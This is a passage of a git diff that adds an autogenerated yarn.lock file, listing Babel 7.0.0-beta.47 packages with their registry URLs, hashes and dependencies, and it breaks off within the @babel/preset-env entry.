+Same as with `atlantis plan`. \ No newline at end of file diff --git a/yarn.lock b/yarn.lock new file mode 100644 index 0000000000..370c576123 --- /dev/null +++ b/yarn.lock @@ -0,0 +1,6179 @@ +# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY. +# yarn lockfile v1 + + +"@babel/code-frame@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/code-frame/-/code-frame-7.0.0-beta.47.tgz#d18c2f4c4ba8d093a2bcfab5616593bfe2441a27" + dependencies: + "@babel/highlight" "7.0.0-beta.47" + +"@babel/core@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.0.0-beta.47.tgz#b9c164fb9a1e1083f067c236a9da1d7a7d759271" + dependencies: + "@babel/code-frame" "7.0.0-beta.47" + "@babel/generator" "7.0.0-beta.47" + "@babel/helpers" "7.0.0-beta.47" + "@babel/template" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + babylon "7.0.0-beta.47" + convert-source-map "^1.1.0" + debug "^3.1.0" + json5 "^0.5.0" + lodash "^4.17.5" + micromatch "^2.3.11" + resolve "^1.3.2" + semver "^5.4.1" + source-map "^0.5.0" + +"@babel/generator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.0.0-beta.47.tgz#1835709f377cc4d2a4affee6d9258a10bbf3b9d1" + dependencies: + "@babel/types" "7.0.0-beta.47" + jsesc "^2.5.1" + lodash "^4.17.5" + source-map "^0.5.0" + trim-right "^1.0.1" + +"@babel/helper-annotate-as-pure@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-annotate-as-pure/-/helper-annotate-as-pure-7.0.0-beta.47.tgz#354fb596055d9db369211bf075f0d5e93904d6f6" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-builder-binary-assignment-operator-visitor@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-builder-binary-assignment-operator-visitor/-/helper-builder-binary-assignment-operator-visitor-7.0.0-beta.47.tgz#d5917c29ee3d68abc2c72f604bc043f6e056e907" + dependencies: + "@babel/helper-explode-assignable-expression" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-call-delegate@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-call-delegate/-/helper-call-delegate-7.0.0-beta.47.tgz#96b7804397075f722a4030d3876f51ec19d8829b" + dependencies: + "@babel/helper-hoist-variables" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-define-map@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-define-map/-/helper-define-map-7.0.0-beta.47.tgz#43a9def87c5166dc29630d51b3da9cc4320c131c" + dependencies: + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/helper-explode-assignable-expression@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-explode-assignable-expression/-/helper-explode-assignable-expression-7.0.0-beta.47.tgz#56b688e282a698f4d1cf135453a11ae8af870a19" + dependencies: + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-function-name@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-function-name/-/helper-function-name-7.0.0-beta.47.tgz#8057d63e951e85c57c02cdfe55ad7608d73ffb7d" + dependencies: + "@babel/helper-get-function-arity" "7.0.0-beta.47" + "@babel/template" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-get-function-arity@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-get-function-arity/-/helper-get-function-arity-7.0.0-beta.47.tgz#2de04f97c14b094b55899d3fa83144a16d207510" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-hoist-variables@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-hoist-variables/-/helper-hoist-variables-7.0.0-beta.47.tgz#ce295d1d723fe22b2820eaec748ed701aa5ae3d0" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-member-expression-to-functions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.0.0-beta.47.tgz#35bfcf1d16dce481ef3dec66d5a1ae6a7d80bb45" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-module-imports@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-module-imports/-/helper-module-imports-7.0.0-beta.47.tgz#5af072029ffcfbece6ffbaf5d9984c75580f3f04" + dependencies: + "@babel/types" "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/helper-module-transforms@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-module-transforms/-/helper-module-transforms-7.0.0-beta.47.tgz#7eff91fc96873bd7b8d816698f1a69bbc01f3c38" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-simple-access" "7.0.0-beta.47" + "@babel/helper-split-export-declaration" "7.0.0-beta.47" + "@babel/template" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/helper-optimise-call-expression@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.0.0-beta.47.tgz#085d864d0613c5813c1b7c71b61bea36f195929e" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-plugin-utils@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-plugin-utils/-/helper-plugin-utils-7.0.0-beta.47.tgz#4f564117ec39f96cf60fafcde35c9ddce0e008fd" + +"@babel/helper-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-regex/-/helper-regex-7.0.0-beta.47.tgz#b8e3b53132c4edbb04804242c02ffe4d60316971" + dependencies: + lodash "^4.17.5" + +"@babel/helper-remap-async-to-generator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-remap-async-to-generator/-/helper-remap-async-to-generator-7.0.0-beta.47.tgz#444dc362f61470bd61a745ebb364431d9ca186c2" + dependencies: + "@babel/helper-annotate-as-pure" "7.0.0-beta.47" + "@babel/helper-wrap-function" "7.0.0-beta.47" + "@babel/template" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-replace-supers@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-replace-supers/-/helper-replace-supers-7.0.0-beta.47.tgz#310b206a302868a792b659455ceba27db686cbb7" + dependencies: + "@babel/helper-member-expression-to-functions" "7.0.0-beta.47" + "@babel/helper-optimise-call-expression" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-simple-access@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-simple-access/-/helper-simple-access-7.0.0-beta.47.tgz#234d754acbda9251a10db697ef50181eab125042" + dependencies: + "@babel/template" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/helper-split-export-declaration@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.0.0-beta.47.tgz#e11277855472d8d83baf22f2d0186c4a2059b09a" + dependencies: + "@babel/types" "7.0.0-beta.47" + +"@babel/helper-wrap-function@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helper-wrap-function/-/helper-wrap-function-7.0.0-beta.47.tgz#6528b44a3ccb4f3aeeb79add0a88192f7eb81161" + dependencies: + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/template" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/helpers@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/helpers/-/helpers-7.0.0-beta.47.tgz#f9b42ed2e4d5f75ec0fb2e792c173e451e8d40fd" + dependencies: + "@babel/template" "7.0.0-beta.47" + "@babel/traverse" "7.0.0-beta.47" + "@babel/types" "7.0.0-beta.47" + +"@babel/highlight@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/highlight/-/highlight-7.0.0-beta.47.tgz#8fbc83fb2a21f0bd2b95cdbeb238cf9689cad494" + dependencies: + chalk "^2.0.0" + esutils "^2.0.2" + js-tokens "^3.0.0" + +"@babel/plugin-proposal-async-generator-functions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-async-generator-functions/-/plugin-proposal-async-generator-functions-7.0.0-beta.47.tgz#571142284708c5ad4ec904d9aa705461a010be53" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-remap-async-to-generator" "7.0.0-beta.47" + "@babel/plugin-syntax-async-generators" "7.0.0-beta.47" + +"@babel/plugin-proposal-class-properties@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-class-properties/-/plugin-proposal-class-properties-7.0.0-beta.47.tgz#08c1a1dfc92d0f5c37b39096c6fb883e1ca4b0f5" + dependencies: + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-replace-supers" "7.0.0-beta.47" + "@babel/plugin-syntax-class-properties" "7.0.0-beta.47" + +"@babel/plugin-proposal-decorators@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-decorators/-/plugin-proposal-decorators-7.0.0-beta.47.tgz#5e8943c8f8eb3301f911ef0dcd3ed64cf28c723e" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-decorators" "7.0.0-beta.47" + +"@babel/plugin-proposal-export-namespace-from@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-export-namespace-from/-/plugin-proposal-export-namespace-from-7.0.0-beta.47.tgz#38171dd0fd5f54aee377d338ed41bb92e25d6720" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-export-namespace-from" "7.0.0-beta.47" + +"@babel/plugin-proposal-function-sent@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-function-sent/-/plugin-proposal-function-sent-7.0.0-beta.47.tgz#3ad46c04a277a887731f21843013292d254f7ba9" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-wrap-function" "7.0.0-beta.47" + "@babel/plugin-syntax-function-sent" "7.0.0-beta.47" + +"@babel/plugin-proposal-numeric-separator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-numeric-separator/-/plugin-proposal-numeric-separator-7.0.0-beta.47.tgz#3ace5cbacb62c3fa223c3c0b66c0c16e63a8e259" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-numeric-separator" "7.0.0-beta.47" + +"@babel/plugin-proposal-object-rest-spread@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-object-rest-spread/-/plugin-proposal-object-rest-spread-7.0.0-beta.47.tgz#e1529fddc88e948868ee1d0edaa27ebd9502322d" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-object-rest-spread" "7.0.0-beta.47" + +"@babel/plugin-proposal-optional-catch-binding@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-optional-catch-binding/-/plugin-proposal-optional-catch-binding-7.0.0-beta.47.tgz#8c6453919537517ea773bb8f3fceda4250795efa" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-optional-catch-binding" "7.0.0-beta.47" + +"@babel/plugin-proposal-throw-expressions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-throw-expressions/-/plugin-proposal-throw-expressions-7.0.0-beta.47.tgz#9a67f8b0852b4b0b255eff5d6d25fa436928424f" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-syntax-throw-expressions" "7.0.0-beta.47" + +"@babel/plugin-proposal-unicode-property-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-proposal-unicode-property-regex/-/plugin-proposal-unicode-property-regex-7.0.0-beta.47.tgz#34d7e4811bdc4f512400bb29d01051842528c8d5" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + regexpu-core "^4.1.4" + +"@babel/plugin-syntax-async-generators@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.0.0-beta.47.tgz#8ab94852bf348badc866af85bd852221f0961256" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-class-properties@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.0.0-beta.47.tgz#de52bed12fd472c848e1562f57dd4a202fe27f11" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-decorators@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-decorators/-/plugin-syntax-decorators-7.0.0-beta.47.tgz#a42f10fcd651940bc475d93b3ac23432b4a8a293" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-dynamic-import@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-dynamic-import/-/plugin-syntax-dynamic-import-7.0.0-beta.47.tgz#ee964915014a687701ee8e15c289e31a7c899e60" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-export-namespace-from@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-export-namespace-from/-/plugin-syntax-export-namespace-from-7.0.0-beta.47.tgz#fd446c76c59849f15e6cde235b5b8e153413f21e" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-function-sent@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-function-sent/-/plugin-syntax-function-sent-7.0.0-beta.47.tgz#8d15536f55b21acdf9bfaa177c46591a589fe8b0" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-import-meta@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.0.0-beta.47.tgz#8ab5174209a954b91e327004a7d16737bcc4774d" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-jsx@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.0.0-beta.47.tgz#f3849d94288695d724bd205b4f6c3c99e4ec24a4" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-numeric-separator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.0.0-beta.47.tgz#9f06cb770a94f464b3b2889d2110080bc302fc80" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-object-rest-spread@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.0.0-beta.47.tgz#21da514d94c138b2261ca09f0dec9abadce16185" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-optional-catch-binding@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.0.0-beta.47.tgz#0b1c52b066aa36893c41450773a5adb904cd4024" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-syntax-throw-expressions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-syntax-throw-expressions/-/plugin-syntax-throw-expressions-7.0.0-beta.47.tgz#8ca197bab3534f443eecd7eb79da47e199dafaf7" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-arrow-functions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-arrow-functions/-/plugin-transform-arrow-functions-7.0.0-beta.47.tgz#d6eecda4c652b909e3088f0983ebaf8ec292984b" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-async-to-generator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-async-to-generator/-/plugin-transform-async-to-generator-7.0.0-beta.47.tgz#5723816ea1e91fa313a84e6ee9cc12ff31d46610" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-remap-async-to-generator" "7.0.0-beta.47" + +"@babel/plugin-transform-block-scoped-functions@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-block-scoped-functions/-/plugin-transform-block-scoped-functions-7.0.0-beta.47.tgz#e422278e06c797b43c45f459d83c7af9d6237002" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-block-scoping@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-block-scoping/-/plugin-transform-block-scoping-7.0.0-beta.47.tgz#b737cc58a81bea57efd5bda0baef9a43a25859ad" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + lodash "^4.17.5" + +"@babel/plugin-transform-classes@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-classes/-/plugin-transform-classes-7.0.0-beta.47.tgz#7aff9cbe7b26fd94d7a9f97fa90135ef20c93fb6" + dependencies: + "@babel/helper-annotate-as-pure" "7.0.0-beta.47" + "@babel/helper-define-map" "7.0.0-beta.47" + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-optimise-call-expression" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-replace-supers" "7.0.0-beta.47" + "@babel/helper-split-export-declaration" "7.0.0-beta.47" + globals "^11.1.0" + +"@babel/plugin-transform-computed-properties@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-computed-properties/-/plugin-transform-computed-properties-7.0.0-beta.47.tgz#56ef2a021769a2b65e90a3e12fd10b791da9f3e0" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-destructuring@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-destructuring/-/plugin-transform-destructuring-7.0.0-beta.47.tgz#452b607775fd1c4d10621997837189efc0a6d428" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-dotall-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-dotall-regex/-/plugin-transform-dotall-regex-7.0.0-beta.47.tgz#d8da9b706d4bfc68dec9d565661f83e6e8036636" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + regexpu-core "^4.1.3" + +"@babel/plugin-transform-duplicate-keys@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-duplicate-keys/-/plugin-transform-duplicate-keys-7.0.0-beta.47.tgz#4aabeda051ca3007e33a207db08f1a0cf9bd253b" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-exponentiation-operator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-exponentiation-operator/-/plugin-transform-exponentiation-operator-7.0.0-beta.47.tgz#930e1abf5db9f4db5b63dbf97f3581ad0be1e907" + dependencies: + "@babel/helper-builder-binary-assignment-operator-visitor" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-for-of@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-for-of/-/plugin-transform-for-of-7.0.0-beta.47.tgz#527d5dc24e4a4ad0fc1d0a3990d29968cb984e76" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-function-name@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-function-name/-/plugin-transform-function-name-7.0.0-beta.47.tgz#fb443c81cc77f3206a863b730b35c8c553ce5041" + dependencies: + "@babel/helper-function-name" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-literals@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-literals/-/plugin-transform-literals-7.0.0-beta.47.tgz#448fad196f062163684a38f10f14e83315892e9c" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-amd@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-amd/-/plugin-transform-modules-amd-7.0.0-beta.47.tgz#84564419b11c1be6b9fcd4c7b3a6737f2335aac4" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-commonjs@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-commonjs/-/plugin-transform-modules-commonjs-7.0.0-beta.47.tgz#dfe5c6d867aa9614e55f7616736073edb3aab887" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-simple-access" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-systemjs@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-systemjs/-/plugin-transform-modules-systemjs-7.0.0-beta.47.tgz#8514dbcdfca3345abd690059e7e8544e16ecbf05" + dependencies: + "@babel/helper-hoist-variables" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-modules-umd@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-modules-umd/-/plugin-transform-modules-umd-7.0.0-beta.47.tgz#6dcfb9661fdd131b20b721044746a7a309882918" + dependencies: + "@babel/helper-module-transforms" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-new-target@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-new-target/-/plugin-transform-new-target-7.0.0-beta.47.tgz#4b5cb7ce30d7bffa105a1f43ed07d6ae206a4155" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-object-super@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-object-super/-/plugin-transform-object-super-7.0.0-beta.47.tgz#ca8e5f326c5011c879f3a6ed749e58bd10fff05d" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-replace-supers" "7.0.0-beta.47" + +"@babel/plugin-transform-parameters@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-parameters/-/plugin-transform-parameters-7.0.0-beta.47.tgz#46a4236040a6552a5f165fb3ddd60368954b0ddd" + dependencies: + "@babel/helper-call-delegate" "7.0.0-beta.47" + "@babel/helper-get-function-arity" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-regenerator@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-regenerator/-/plugin-transform-regenerator-7.0.0-beta.47.tgz#86500e1c404055fb98fc82b73b09bd053cacb516" + dependencies: + regenerator-transform "^0.12.3" + +"@babel/plugin-transform-runtime@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-runtime/-/plugin-transform-runtime-7.0.0-beta.47.tgz#1700938fa8710909cbf28f7dd39f9b40688b09fd" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-shorthand-properties@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.0.0-beta.47.tgz#00be44c4fad8fe2c00ed18ea15ea3c88dd519dbb" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-spread@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-spread/-/plugin-transform-spread-7.0.0-beta.47.tgz#3feadb02292ed1e9b75090d651b9df88a7ab5c50" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-sticky-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.0.0-beta.47.tgz#c0aa347d76b5dc87d3b37ac016ada3f950605131" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + +"@babel/plugin-transform-template-literals@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.0.0-beta.47.tgz#5f7b5badf64c4c5da79026aeab03001e62a6ee5f" + dependencies: + "@babel/helper-annotate-as-pure" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-typeof-symbol@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.0.0-beta.47.tgz#03c612ec09213eb386a81d5fa67c234ee4b2034c" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + +"@babel/plugin-transform-unicode-regex@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.0.0-beta.47.tgz#efed0b2f1dfbf28283502234a95b4be88f7fdcb6" + dependencies: + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/helper-regex" "7.0.0-beta.47" + regexpu-core "^4.1.3" + +"@babel/preset-env@7.0.0-beta.47": + version "7.0.0-beta.47" + resolved "https://registry.yarnpkg.com/@babel/preset-env/-/preset-env-7.0.0-beta.47.tgz#a3dab3b5fac4de56e3510bdbcb528f1cbdedbe2d" + dependencies: + "@babel/helper-module-imports" "7.0.0-beta.47" + "@babel/helper-plugin-utils" "7.0.0-beta.47" + "@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47" + "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47" + "@babel/plugin-syntax-async-generators" "7.0.0-beta.47" + "@babel/plugin-syntax-object-rest-spread" "7.0.0-beta.47" + "@babel/plugin-syntax-optional-catch-binding" "7.0.0-beta.47" + "@babel/plugin-transform-arrow-functions" "7.0.0-beta.47" + "@babel/plugin-transform-async-to-generator" "7.0.0-beta.47" + 